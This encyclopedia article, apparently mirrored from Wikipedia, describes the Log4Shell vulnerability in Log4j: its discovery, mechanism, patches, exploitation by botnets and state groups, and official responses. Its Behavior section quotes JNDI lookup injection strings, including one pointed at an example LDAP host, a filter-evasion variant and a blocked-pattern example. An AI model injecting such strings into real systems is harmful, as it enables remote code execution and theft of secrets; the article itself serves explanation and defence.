Log4Shell

Last updated

Log4Shell
CVE identifier(s) CVE- 2021-44228
Date discovered24 November 2021;2 years ago (2021-11-24)
Date patched6 December 2021;2 years ago (2021-12-06)
DiscovererChen Zhaojun of the Alibaba Cloud Security Team [1]
Affected softwareApplications logging user input using Log4j 2

Log4Shell (CVE-2021-44228) is a zero-day vulnerability in Log4j, a popular Java logging framework, involving arbitrary code execution. [2] [3] The vulnerability had existed unnoticed since 2013 and was privately disclosed to the Apache Software Foundation, of which Log4j is a project, by Chen Zhaojun of Alibaba Cloud's security team on 24 November 2021. Before an official CVE identifier was made available on 10 December 2021, the vulnerability circulated with the name "Log4Shell", given by Free Wortley of the LunaSec team, which was initially used to track the issue online. [2] [1] [4] [5] [6] Apache gave Log4Shell a CVSS severity rating of 10, the highest available score. [7] The exploit was simple to execute and is estimated to have had the potential to affect hundreds of millions of devices. [6] [8]

Contents

The vulnerability takes advantage of Log4j's allowing requests to arbitrary LDAP and JNDI servers, [2] [9] [10] allowing attackers to execute arbitrary Java code on a server or other computer, or leak sensitive information. [5] A list of its affected software projects has been published by the Apache Security Team. [11] Affected commercial services include Amazon Web Services, [12] Cloudflare, iCloud, [13] Minecraft: Java Edition , [14] Steam, Tencent QQ and many others. [9] [15] [16] According to Wiz and EY, the vulnerability affected 93% of enterprise cloud environments. [17]

The vulnerability's disclosure received strong reactions from cybersecurity experts. Cybersecurity company Tenable said the exploit was "the single biggest, most critical vulnerability ever," [18] Ars Technica called it "arguably the most severe vulnerability ever" [19] and The Washington Post said that descriptions by security professionals "border on the apocalyptic." [8]

Background

Log4j is an open-source logging framework that allows software developers to log data within their applications. This data can include user input. [20] It is used ubiquitously in Java applications, especially enterprise software. [5] Originally written in 2001 by Ceki Gülcü, it is now part of Apache Logging Services, a project of the Apache Software Foundation. [21] Tom Kellermann, a member of President Obama's Commission on Cyber Security, described Apache as "one of the giant supports of a bridge that facilitates the connective tissue between the worlds of applications and computer environments". [22]

Behavior

The Java Naming and Directory Interface (JNDI) allows for lookup of Java objects at program runtime given a path to their data. JNDI can use several directory interfaces, each providing a different scheme of looking up files. Among these interfaces is the Lightweight Directory Access Protocol (LDAP), a non-Java-specific protocol [23] which retrieves the object data as a URL from an appropriate server, either local or anywhere on the Internet. [24]

In the default configuration, when logging a string, Log4j 2 performs string substitution on expressions of the form ${prefix:name}. [24] For example, Text: ${java:version} might be converted to Text: Java version 1.7.0_67. [25] Among the recognized expressions is ${jndi:<lookup>}; by specifying the lookup to be through LDAP, an arbitrary URL may be queried and loaded as Java object data. ${jndi:ldap://example.com/file}, for example, will load data from that URL if connected to the Internet. By inputting a string that is logged, an attacker can load and execute malicious code hosted on a public URL. [24] Even if execution of the data is disabled, an attacker can still retrieve data—such as secret environment variables—by placing them in the URL, in which case they will be substituted and sent to the attacker's server. [26] [27] Besides LDAP, other potentially exploitable JNDI lookup protocols include its secure variant LDAPS, Java Remote Method Invocation (RMI), the Domain Name System (DNS), and the Internet Inter-ORB Protocol (IIOP). [28] [29]

Because HTTP requests are frequently logged, a common attack vector is placing the malicious string in the HTTP request URL or a commonly logged HTTP header, such as User-Agent. Early mitigations included blocking any requests containing potentially malicious contents, such as ${jndi. [30] Such basic string matching solutions can be circumvented by obfuscating the request: ${${lower:j}ndi, for example, will be converted into a JNDI lookup after performing the lowercase operation on the letter j. [31] Even if an input, such as a first name, is not immediately logged, it may be later logged during internal processing and its contents executed. [24]

Mitigation

Fixes for this vulnerability were released on 6 December 2021, three days before the vulnerability was published, in Log4j version 2.15.0-rc1. [32] [33] [34] The fix included restricting the servers and protocols that may be used for lookups. Researchers discovered a related bug, CVE-2021-45046, that allows local or remote code execution in certain non-default configurations and was fixed in version 2.16.0, which disabled all features using JNDI and support for message lookups. [35] [36] Two more vulnerabilities in the library were found: a denial-of-service attack, tracked as CVE-2021-45105 and fixed in 2.17.0; and a difficult-to-exploit remote code execution vulnerability, tracked as CVE-2021-44832 and fixed in 2.17.1. [37] [38] For previous versions, the class org.apache.logging.log4j.core.lookup.JndiLookup needs to be removed from the classpath to mitigate both vulnerabilities. [7] [35] An early recommended fix for older versions was to set the system property log4j2.formatMsgNoLookups to true, but this change does not prevent exploitation of CVE-2021-45046 and was later found to not disable message lookups in certain cases. [7] [35]

Newer versions of the Java Runtime Environment (JRE) also mitigate this vulnerability by blocking remote code from being loaded by default, although other attack vectors still exist in certain applications. [2] [26] [39] [40] Several methods and tools have been published that help detect vulnerable Log4j versions used in built Java packages. [41]

Where applying updated versions has not been possible, due to a variety of constraints such as lack of resources or third-party managed solutions, filtering outbound network traffic from vulnerable deployments has been the primary recourse for many. [42] The approach is recommended by NCC Group [43] and the National Cyber Security Centre (United Kingdom), [44] and is an example of a defense in depth measure. The effectiveness of such filtering is evidenced [45] by laboratory experiments conducted with firewalls capable of intercepting the egress traffic with several wholly or partially vulnerable versions of the library itself and the JRE.

Usage

The exploit allows hackers to gain control of vulnerable devices using Java. [6] Some hackers employ the vulnerability to use victims' devices for cryptocurrency mining, creating botnets, sending spam, establishing backdoors and other illegal activities such as ransomware attacks. [6] [8] [46] In the days following the vulnerability's disclosure, Check Point observed millions of attacks being initiated by hackers, with some researchers observing a rate of over one hundred attacks per minute that ultimately resulted with attempted attacks on over 40% of business networks internationally. [6] [22]

According to Cloudflare CEO Matthew Prince, evidence for usage or testing of the exploit goes back as early as 1 December, nine days before it was publicly disclosed. [47] According to cybersecurity firm GreyNoise, several IP addresses were scraping websites to check for servers that had the vulnerability. [48] Several botnets began scanning for the vulnerability, including the Muhstik botnet by 10 December, as well as Mirai and Tsunami. [6] [47] [49] Ransomware group Conti was observed using the vulnerability on 17 December. [8]

Some state-sponsored groups in China and Iran also utilized the exploit according to Check Point, but it is not known if the exploit was used by Israel, Russia or the United States prior to the disclosure of the vulnerability. [8] [18] Check Point said that on 15 December 2021, Iran-backed hackers attempted to infiltrate the networks of Israeli businesses and government institutions. [8]

Response and impact

Governmental

In the United States, the director of the Cybersecurity and Infrastructure Security Agency (CISA), Jen Easterly, described the exploit as "one of the most serious I've seen in my entire career, if not the most serious", explaining that hundreds of millions of devices were affected and advising vendors to prioritize software updates. [6] [50] [46] Civilian agencies contracted by the United States government had until 24 December 2021 to patch vulnerabilities. [8] On 4 January, the Federal Trade Commission (FTC) stated its intent to pursue companies that fail to take reasonable steps to update used Log4j software. [51] In a White House meeting, the importance of security maintenance of open-source software – often also carried out largely by few volunteers – to national security was clarified. While some open-source projects have many eyes on them, others do not have many or any people ensuring their security. [52] [53]

Germany's Bundesamt für Sicherheit in der Informationstechnik (BSI) designated the exploit as being at the agency's highest threat level, calling it an "extremely critical threat situation" (translated). It also reported that several attacks were already successful and that the extent of the exploit remained hard to assess. [54] [55] The Netherlands's National Cyber Security Centre (NCSC) began an ongoing list of vulnerable applications. [56] [57]

The Canadian Centre for Cyber Security (CCCS) called on organizations to take immediate action. [58] The Canada Revenue Agency temporarily shut down its online services after learning of the exploit, while the Government of Quebec closed almost 4,000 of its websites as a "preventative measure." [59] The Belgian Ministry of Defence experienced a breach attempt and was forced to shut down part of its network. [60]

The Chinese Ministry of Industry and Information Technology suspended work with Alibaba Cloud as a cybersecurity threat intelligence partner for six months for failing to report the vulnerability to the government first. [61]

Businesses

Research conducted by Wiz and EY [17] showed that 93% of the cloud enterprise environment were vulnerable to Log4Shell. 7% of vulnerable workloads are exposed to the Internet and prone to wide exploitation attempts. According to the research, ten days after vulnerability disclosure (20 December 2021) only 45% of vulnerable workloads were patched on average in cloud environments. Amazon, Google and Microsoft cloud data was affected by Log4Shell. [8] Microsoft asked Windows and Azure customers to remain vigilant after observing state-sponsored and cyber-criminal attackers probing systems for the Log4j 'Log4Shell' flaw through December 2021. [62]

The human resource management and workforce management company UKG, one of the largest businesses in the industry, was targeted by a ransomware attack that affected large businesses. [19] [63] UKG said it did not have evidence of Log4Shell being exploited in the incident, though analyst Allan Liska from cybersecurity company Recorded Future said there was possibly a connection. [63]

As larger companies began to release patches for the exploit, the risk for small businesses increased as hackers focused on more vulnerable targets. [46]

Privacy

Some personal devices connected to the Internet, such as smart TVs and security cameras, were vulnerable to the exploit. Some software may never get a patch due to discontinued manufacturer support. [8]

Analysis

As of 14 December 2021, almost half of all corporate networks globally have been actively probed, with over 60 variants of the exploit having been produced within 24 hours. [64] Check Point Software Technologies in a detailed analysis described the situation as being "a true cyber-pandemic" and characterizing the potential for damage as being "incalculable". [65] Several initial advisories exaggerated the amount of packages that were vulnerable, leading to false positives. Most notably, the "log4j-api" package was marked as vulnerable, while in reality further research showed that only the main "log4j-core" package was vulnerable. This was confirmed both in the original issue thread [66] and by external security researchers. [67]

Technology magazine Wired wrote that despite the previous "hype" surrounding multiple vulnerabilities, "the Log4j vulnerability ... lives up to the hype for a host of reasons". [18] The magazine explains that the pervasiveness of Log4j, the vulnerability being difficult to detect by potential targets and the ease of transmitting code to victims created a "combination of severity, simplicity, and pervasiveness that has the security community rattled". [18] Wired also outlined stages of hackers using Log4Shell; cryptomining groups first using the vulnerability, data brokers then selling a "foothold" to cybercriminals, who finally go on to engage in ransomware attacks, espionage and destroying data. [18]

Amit Yoran, CEO of Tenable and the founding director of the United States Computer Emergency Readiness Team, stated "[Log4Shell] is by far the single biggest, most critical vulnerability ever", noting that sophisticated attacks were beginning shortly after the bug, saying "We're also already seeing it leveraged for ransomware attacks, which, again, should be a major alarm bell ... We've also seen reports of attackers using Log4Shell to destroy systems without even looking to collect ransom, a fairly unusual behavior". [18] Sophos's senior threat researcher Sean Gallagher said, "Honestly, the biggest threat here is that people have already gotten access and are just sitting on it, and even if you remediate the problem somebody's already in the network ... It's going to be around as long as the Internet." [18]

According to a Bloomberg News report, some anger was directed at Apache's developers at their failure to fix the vulnerability after warnings about exploits of broad classes of software, including Log4j, were made at a 2016 cybersecurity conference. [68]

Related Research Articles

<span class="mw-page-title-main">Computer security</span> Protection of computer systems from information disclosure, theft or damage

Computer security, cybersecurity, digital security or information technology security is the protection of computer systems and networks from attacks by malicious actors that may result in unauthorized information disclosure, theft of, or damage to hardware, software, or data, as well as from the disruption or misdirection of the services they provide.

The Java Naming and Directory Interface (JNDI) is a Java API for a directory service that allows Java software clients to discover and look up data and resources via a name. Like all Java APIs that interface with host systems, JNDI is independent of the underlying implementation. Additionally, it specifies a service provider interface (SPI) that allows directory service implementations to be plugged into the framework. The information looked up via JNDI may be supplied by a server, a flat file, or a database; the choice is up to the implementation used.

In computer security, arbitrary code execution (ACE) is an attacker's ability to run any commands or code of the attacker's choice on a target machine or in a target process. An arbitrary code execution vulnerability is a security flaw in software or hardware allowing arbitrary code execution. A program that is designed to exploit such a vulnerability is called an arbitrary code execution exploit. The ability to trigger arbitrary code execution over a network is often referred to as remote code execution (RCE).

Ransomware is a type of cryptovirological malware that permanently block access to the victim's personal data unless a ransom is paid. While some simple ransomware may lock the system without damaging any files, more advanced malware uses a technique called cryptoviral extortion. It encrypts the victim's files, making them inaccessible, and demands a ransom payment to decrypt them. In a properly implemented cryptoviral extortion attack, recovering the files without the decryption key is an intractable problem, and difficult-to-trace digital currencies such as paysafecard or Bitcoin and other cryptocurrencies are used for the ransoms, making tracing and prosecuting the perpetrators difficult.

<span class="mw-page-title-main">Log4j</span> Java-based logging software

Apache Log4j is a Java-based logging utility originally written by Ceki Gülcü. It is part of the Apache Logging Services, a project of the Apache Software Foundation. Log4j is one of several Java logging frameworks.

A supply chain attack is a cyber-attack that seeks to damage an organization by targeting less secure elements in the supply chain. A supply chain attack can occur in any industry, from the financial sector, oil industry, to a government sector. A supply chain attack can happen in software or hardware. Cybercriminals typically tamper with the manufacturing or distribution of a product by installing malware or hardware-based spying components. Symantec's 2019 Internet Security Threat Report states that supply chain attacks increased by 78 percent in 2018.

Trellix is a privately held cybersecurity company that was founded in 2022. It has been involved in the detection and prevention of major cybersecurity attacks. It provides hardware, software, and services to investigate cybersecurity attacks, protect against malicious software, and analyze IT security risks.

Kiteworks, formerly known as Accellion, Inc., is an American technology company that secures sensitive content communications over channels such as email, file share, file transfer, managed file transfer, web forms, and application programming interfaces. The company was founded in 1999 in Singapore and is now based in San Mateo, California.

<span class="mw-page-title-main">October (CMS)</span> Content management system

October is a self-hosted content management system (CMS) based on the PHP programming language and Laravel web application framework. It supports MariaDB, MySQL, PostgreSQL, SQLite and SQL Server for the database back end and uses a flat file database for the front end structure. The October CMS covers a range of capabilities such as users, permissions, themes, and plugins, and is seen as a simpler alternative to WordPress.

MOVEit is a managed file transfer software product produced by Ipswitch, Inc.. MOVEit encrypts files and uses file transfer protocols such as FTP(S) or SFTP to transfer data, as well as providing automation services, analytics and failover options. The software has been used in the healthcare industry by companies such as Rochester Hospital and Medibank, as well as thousands of IT departments in high technology, government, and financial service companies like Zellis.

A medical device hijack is a type of cyber attack. The weakness they target are the medical devices of a hospital. This was covered extensively in the press in 2015 and in 2016.

<span class="mw-page-title-main">WannaCry ransomware attack</span> 2017 worldwide ransomware cyberattack

The WannaCry ransomware attack was a worldwide cyberattack in May 2017 by the WannaCry ransomware cryptoworm, which targeted computers running the Microsoft Windows operating system by encrypting data and demanding ransom payments in the Bitcoin cryptocurrency. It propagated by using EternalBlue, an exploit developed by the United States National Security Agency (NSA) for Windows systems. EternalBlue was stolen and leaked by a group called The Shadow Brokers a month prior to the attack. While Microsoft had released patches previously to close the exploit, much of WannaCry's spread was from organizations that had not applied these, or were using older Windows systems that were past their end-of-life. These patches were imperative to cyber security, but many organizations did not apply them, citing a need for 24/7 operation, the risk of formerly working applications breaking because of the changes, lack of personnel or time to install them, or other reasons.

EternalBlue is a computer exploit developed by the U.S. National Security Agency (NSA). It was based on a vulnerability in Microsoft networking software that the NSA had known about for several years but had not disclosed to Microsoft. When the NSA discovered in 2017 that the exploit was stolen, Microsoft was informed and released security patches in March 2017. The Shadow Brokers hacker group publicly released EternalBlue on April 14, 2017.

<span class="mw-page-title-main">KRACK</span> Attack on the Wi-Fi Protected Access protocol

KRACK is a replay attack on the Wi-Fi Protected Access protocol that secures Wi-Fi connections. It was discovered in 2016 by the Belgian researchers Mathy Vanhoef and Frank Piessens of the University of Leuven. Vanhoef's research group published details of the attack in October 2017. By repeatedly resetting the nonce transmitted in the third step of the WPA2 handshake, an attacker can gradually match encrypted packets seen before and learn the full keychain used to encrypt the traffic.

The Zealot Campaign is a cryptocurrency mining malware collected from a series of stolen National Security Agency (NSA) exploits, released by the Shadow Brokers group on both Windows and Linux machines to mine cryptocurrency, specifically Monero. Discovered in December 2017, these exploits appeared in the Zealot suite include EternalBlue, EternalSynergy, and Apache Struts Jakarta Multipart Parser attack exploit, or CVE-2017-5638. The other notable exploit within the Zealot vulnerabilities includes vulnerability CVE-2017-9822, known as DotNetNuke (DNN) which exploits a content management system so that the user can install a Monero miner software. An estimated USD $8,500 of Monero having been mined on a single targeted computer. The campaign was discovered and studied extensively by F5 Networks in December 2017.

<span class="mw-page-title-main">BlueKeep</span> Windows security hole

BlueKeep is a security vulnerability that was discovered in Microsoft's Remote Desktop Protocol (RDP) implementation, which allows for the possibility of remote code execution.

A global wave of cyberattacks and data breaches began in January 2021 after four zero-day exploits were discovered in on-premises Microsoft Exchange Servers, giving attackers full access to user emails and passwords on affected servers, administrator privileges on the server, and access to connected devices on the same network. Attackers typically install a backdoor that allows the attacker full access to impacted servers even if the server is later updated to no longer be vulnerable to the original exploits. As of 9 March 2021, it was estimated that 250,000 servers fell victim to the attacks, including servers belonging to around 30,000 organizations in the United States, 7,000 servers in the United Kingdom, as well as the European Banking Authority, the Norwegian Parliament, and Chile's Commission for the Financial Market (CMF).

<span class="mw-page-title-main">Sakura Samurai (group)</span> Hacker group

Sakura Samurai was a white hat hacking and security research group that was founded in 2020. The group is responsible for multiple vulnerability disclosures involving governmental groups and various corporations.

A wave of cyberattacks and data breaches began in June 2023 after a vulnerability was discovered in MOVEit, a managed file transfer software.

References

  1. 1 2 Povolny, Steve; McKee, Douglas (10 December 2021). "Log4Shell Vulnerability is the Coal in our Stocking for 2021". McAfee . Retrieved 12 December 2021.
  2. 1 2 3 4 Wortley, Free; Thrompson, Chris; Allison, Forrest (9 December 2021). "Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package". LunaSec. Retrieved 12 December 2021.
  3. "CVE-2021-44228". Common Vulnerabilities and Exposures. Retrieved 12 December 2021.
  4. "Worst Apache Log4j RCE Zero day Dropped on Internet". Cyber Kendra. 9 December 2021. Retrieved 12 December 2021.
  5. 1 2 3 Newman, Lily Hay (10 December 2021). "'The Internet Is on Fire'". Wired. ISSN   1059-1028 . Retrieved 12 December 2021.
  6. 1 2 3 4 5 6 7 Murphy, Hannah (14 December 2021). "Hackers launch more than 1.2m attacks through Log4J flaw". Financial Times . Retrieved 17 December 2021.
  7. 1 2 3 "Apache Log4j Security Vulnerabilities". Log4j. Apache Software Foundation. Retrieved 12 December 2021.
  8. 1 2 3 4 5 6 7 8 9 Hunter, Tatum; de Vynck, Gerrit (20 December 2021). "The 'most serious' security breach ever is unfolding right now. Here's what you need to know". The Washington Post .
  9. 1 2 Mott, Nathaniel (10 December 2021). "Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit". PC Magazine . Retrieved 12 December 2021.
  10. Goodin, Dan (10 December 2021). "Zero-day in ubiquitous Log4j tool poses a grave threat to the Internet". Ars Technica. Retrieved 12 December 2021.
  11. "Apache projects affected by log4j CVE-2021-44228". 14 December 2021.
  12. "Update for Apache Log4j2 Issue (CVE-2021-44228)". Amazon Web Services. 12 December 2021. Retrieved 13 December 2021.
  13. Lovejoy, Ben (14 December 2021). "Apple patches Log4Shell iCloud vulnerability, described as most critical in a decade". 9to5Mac .
  14. "Security Vulnerability in Minecraft: Java Edition". Minecraft. Mojang Studios . Retrieved 13 December 2021.
  15. Goodin, Dan (10 December 2021). "The Internet's biggest players are all affected by critical Log4Shell 0-day". ArsTechnica . Retrieved 13 December 2021.
  16. Rundle, David Uberti and James (15 December 2021). "What Is the Log4j Vulnerability?". Wall Street Journal via www.wsj.com.
  17. 1 2 "Enterprises halfway through patching Log4Shell | Wiz Blog". www.wiz.io. 20 December 2021. Retrieved 20 December 2021.
  18. 1 2 3 4 5 6 7 Barrett, Brian. "The Next Wave of Log4J Attacks Will Be Brutal". Wired . ISSN   1059-1028 . Retrieved 17 December 2021.
  19. 1 2 Goodin, Dan (13 December 2021). "As Log4Shell wreaks havoc, payroll service reports ransomware attack". Ars Technica . Retrieved 17 December 2021.
  20. Yan, Tao; Deng, Qi; Zhang, Haozhe; Fu, Yu; Grunzweig, Josh (10 December 2021). "Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228)". Unit 42. Palo Alto Networks.
  21. "Apache Log4j 2". Apache Software Foundation. Retrieved 12 December 2021.
  22. 1 2 Byrnes, Jesse (14 December 2021). "Hillicon Valley — Apache vulnerability sets off alarm bells". TheHill . Retrieved 17 December 2021.
  23. Sermersheim, J. (June 2006). Lightweight Directory Access Protocol (LDAP): The Protocol. International Electronic Task Force. doi: 10.17487/RFC4513 . RFC rfc4511 . Retrieved 13 December 2021.
  24. 1 2 3 4 Graham-Cumming, John (10 December 2021). "Inside the Log4j2 vulnerability (CVE-2021-44228)". The Cloudflare Blog. Retrieved 13 December 2021.
  25. "Lookups". Log4j. Apache Software Foundation. Retrieved 13 December 2021.
  26. 1 2 Ducklin, Paul (12 December 2021). "Log4Shell explained – how it works, why you need to know, and how to fix it". Naked Security. Sophos. Retrieved 12 December 2021.
  27. Miessler, Daniel (13 December 2021). "The log4j (Log4Shell) Situation". Unsupervised Learning.
  28. Duraishamy, Ranga; Verma, Ashish; Ang, Miguel Carlo (13 December 2021). "Patch Now Apache Log4j Vulnerability Called Log4Shell Actively Exploited". Trend Micro. Retrieved 14 December 2021.
  29. Narang, Satnam (10 December 2021). "CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell)". Tenable Blog. Retrieved 14 December 2021.
  30. Gabor, Gabriel; Bluehs, Gabriel (10 December 2021). "CVE-2021-44228 - Log4j RCE 0-day mitigation". The Cloudflare Blog. Retrieved 13 December 2021.
  31. Hahad, Mounir (12 December 2021). "Apache Log4j Vulnerability CVE-2021-44228 Raises widespread Concerns" . Retrieved 12 December 2021.
  32. "Restrict LDAP access via JNDI by rgoers #608". Log4j. 5 December 2021. Retrieved 12 December 2021 via GitHub.
  33. Berger, Andreas (17 December 2021). "What is Log4Shell? The Log4j vulnerability explained (and what to do about it)". Dynatrace news. Apache issued a patch for CVE-2021-44228, version 2.15, on December 6. However, this patch left part of the vulnerability unfixed, resulting in CVE-2021-45046 and a second patch, version 2.16, released on December 13. Apache released a third patch, version 2.17, on December 17 to fix another related vulnerability, CVE-2021-45105.
  34. Rudis, boB (10 December 2021). "Widespread Exploitation of Critical Remote Code Execution in Apache Log4j | Rapid7 Blog". Rapid7.
  35. 1 2 3 "CVE-2021-45046". Common Vulnerabilities and Exposures. 15 December 2021. Retrieved 15 December 2021.
  36. Greig, Jonathan (14 December 2021). "Second Log4j vulnerability discovered, patch already released". ZDNet. Retrieved 17 December 2021.
  37. "CVE-2021-45105". National Vulnerability Database. Retrieved 4 January 2022.
  38. "CVE-2021-44832". National Vulnerability Database. Retrieved 4 January 2022.
  39. "Java(TM) SE Development Kit 8, Update 121 (JDK 8u121) Release Notes". Oracle. 17 January 2017. Retrieved 13 December 2021.
  40. "Exploiting JNDI Injections in Java". Veracode. 3 January 2019. Retrieved 15 December 2021.
  41. "Guide: How To Detect and Mitigate the Log4Shell Vulnerability (CVE-2021-44228)". www.lunasec.io. 13 December 2021. Retrieved 13 December 2021.
  42. "Review of the December 2021 Log4j Event" (PDF). Cyber Safety Review Board. 11 July 2022. Retrieved 18 January 2023.
  43. "Apache Log4j Zero Day Recommendations & Resources". NCC Group . Retrieved 18 January 2023.
  44. "Alert: Apache Log4j vulnerabilities". National Cyber Security Centre (United Kingdom). 10 December 2021. Retrieved 18 January 2023.
  45. "Log4Shell and its traces in a network egress filter". Chaser Systems. 12 December 2021. Retrieved 18 January 2023.
  46. 1 2 3 Woodyard, Chris. "'Critical vulnerability': Smaller firms may find it harder to stop hackers from exploiting Log4j flaw". USA Today . Retrieved 17 December 2021.
  47. 1 2 Duckett, Chris. "Log4j RCE activity began on 1 December as botnets start using vulnerability". ZDNet. Retrieved 13 December 2021.
  48. "Exploit activity for Apache Log4j vulnerability - CVE-2021-44228". Greynoise Research. 10 December 2021. Retrieved 14 December 2021.
  49. Zugec, Martin (13 December 2021). "Technical Advisory: Zero-day critical vulnerability in Log4j2 exploited in the wild". Business Insights. Bitdefender.
  50. "Statement from CISA Director Easterly on "Log4j" Vulnerability". CISA. 11 December 2021.
  51. "FTC warns companies to remediate Log4j security vulnerability". Federal Trade Commission (FTC). 4 January 2022. Retrieved 6 January 2022.
  52. "After Log4j, Open-Source Software Is Now a National Security Issue". Gizmodo. Retrieved 16 January 2022.
  53. Greig, Jonathan. "After Log4j, White House fears the next big open source vulnerability". ZDNet. Retrieved 16 January 2022.
  54. Sauerwein, Jörg (12 December 2021). "BSI warnt vor Sicherheitslücke". Tagesschau (in German).
  55. "Warnstufe Rot: Schwachstelle Log4Shell führt zu extrem kritischer Bedrohungslage" [Red alarm: Log4Shell vulnerability causes extremely critical threat situation] (Press release) (in German). Federal Office for Information Security. 11 December 2021.
  56. J. Vaughan-Nichols, Steven (14 December 2021). "Log4Shell: We Are in So Much Trouble". The New Stack.
  57. "NCSC-NL/log4shell". National Cyber Security Centre (Netherlands). Retrieved 14 December 2021 via GitHub.
  58. "Statement from the Minister of National Defence on Apache Vulnerability and Call to Canadian Organizations to Take Urgent Action". Government of Canada. 12 December 2021. Archived from the original on 20 December 2021. Retrieved 12 December 2021.
  59. Cabrera, Holly (12 December 2021). "Facing cybersecurity threats, Quebec shuts down government websites for evaluation". CBC News . Retrieved 12 December 2021.
  60. Stupp, Catherine (21 December 2021). "Hackers Exploit Log4j Flaw at Belgian Defense Ministry". The Wall Street Journal. Archived from the original on 7 February 2022. Retrieved 14 February 2022.{{cite web}}: CS1 maint: bot: original URL status unknown (link)
  61. "Apache Log4j bug: China's industry ministry pulls support from Alibaba Cloud for not reporting flaw to government first". 22 December 2021.
  62. Tung, Liam. "Log4j flaw attack levels remain high, Microsoft warns". ZDNet. Retrieved 5 January 2022.
  63. 1 2 Bray, Hiawatha (15 December 2021). "Emerging 'Log4j' software bug spawns worldwide worry over cyber attacks - The Boston Globe". The Boston Globe . Retrieved 17 December 2021.
  64. "Almost half of networks probed for Log4Shell weaknesses". ComputerWeekly . 14 December 2021.
  65. "The numbers behind a cyber pandemic – detailed dive". Check Point Software. 13 December 2021.
  66. "LOG4J2-3201: Limit the protocols JNDI can use and restrict LDAP". Apache's JIRA issue tracker. Retrieved 14 December 2021.
  67. Menashe, Shachar (13 December 2021). "Log4Shell 0-Day Vulnerability: All You Need To Know". JFrog Blog. Retrieved 13 December 2021.
  68. "Inside the Race to Fix a Potentially Disastrous Software Flaw". Bloomberg.com. 13 December 2021.
This page is based on this Wikipedia article
Text is available under the CC BY-SA 4.0 license; additional terms may apply.
Images, videos and audio are available under their respective licenses.